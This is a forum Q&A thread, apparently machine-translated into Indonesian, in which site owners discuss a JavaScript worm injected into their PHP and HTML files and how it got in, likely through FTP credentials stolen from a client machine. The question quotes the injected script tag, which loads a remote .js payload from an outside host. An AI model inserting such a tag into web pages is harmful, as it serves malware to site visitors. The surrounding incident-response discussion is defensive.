JS Worm: cara menemukan titik masuk

0

situs saya ditandai sebagai berbahaya oleh Google / StopBadware.org, dan saya menemukan ini di beberapa file js / html:

<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script>
<!--a0e2c33acd6c12bdc9e3f3ba50c98197-->

Saya membersihkan beberapa file, saya mengembalikan cadangan tetapi bagaimana memahami bagaimana worm telah diinstal? Apa yang bisa saya cari di file log? Server ini, Centos 5, hanya digunakan sebagai server apache, dengan program kami, tikiwiki, drupal yang diinstal.

Terima kasih
Cédric

Cédric Girard
sumber

Jawaban:

1

Analisis insiden intrusi tidak pernah mudah, khususnya jika Anda belum mengikuti prosedur standar untuk pemulihan (mengambil server fisik offline, ambil gambar sektor dari semua sistem file yang memiliki akses, membangun kembali mesin sepenuhnya dari menginstal media, mengembalikan data) .

Biasanya, Anda akan meninjau semua kepalan file log, dimulai dengan log Apache. Vektor serangan yang paling mungkin adalah, dalam kasus Anda, drupal tetapi tidak berarti satu-satunya yang mungkin jadi semua log harus diperiksa (maksud saya SEMUA log). Bergantung pada sistem file yang Anda gunakan, langkah-langkah tambahan dapat diambil untuk mengidentifikasi aktivitas apa yang terjadi pada saat infeksi dan mencari tahu vektor serangan yang digunakan dan apa yang dilakukan.

Sementara itu, periksa semua perangkat lunak yang dijalankan oleh mesin Anda dan pastikan semuanya mutakhir. Itu termasuk semua modul drupal Anda, tema, dll. Saya juga akan memeriksa kode khusus dengan sisir.

Sunting: Saya lupa menyebutkan fakta bahwa, dalam kasus Anda dan karena Anda tampaknya tidak memiliki keahlian yang relevan di rumah, Anda mungkin ingin mempertimbangkan untuk mengontrak insiden tersebut ke perusahaan keamanan yang melakukan analisis forensik: mungkin sedikit tentang sisi mahal, tetapi Anda akan mendapatkan jawaban yang jelas tentang apa yang terjadi dan bagaimana mencegahnya.

Stephane
sumber
2

Kami memiliki masalah ini di server kami juga (mulai 11. Juni), dengan worm menyuntikkan konten yang sama persis seperti yang Anda tulis di atas.

Sepertinya tidak ada koneksi dengan apache / php yang terkait; worm hanya terhubung melalui FTP dan menambahkan tag skrip ini ke * .php dan * .html. Tidak ada kata sandi yang tidak valid; mereka mendapatkannya pada percobaan pertama.

Karena itu, saya pikir ini mungkin terkait dengan klien. Saya pikir klien memiliki virus yang mendengarkan aktivitas FTP, atau mungkin memeriksa kata sandi yang disimpan di FileZilla. Saya tidak yakin, dan akan menyelidiki ini lebih lanjut. Jika Anda beruntung, mohon informasikan kepada kami melalui utas ini.

Sunting: FYI, klien kami tidak menggunakan Drupal. Itu hanya Joomla, dan beberapa file HTML statis.


sumber
Saya mencari melalui ftp log untuk serangan brute force, tetapi Anda benar, itu telah memodifikasi file melalui ftp.
Cédric Girard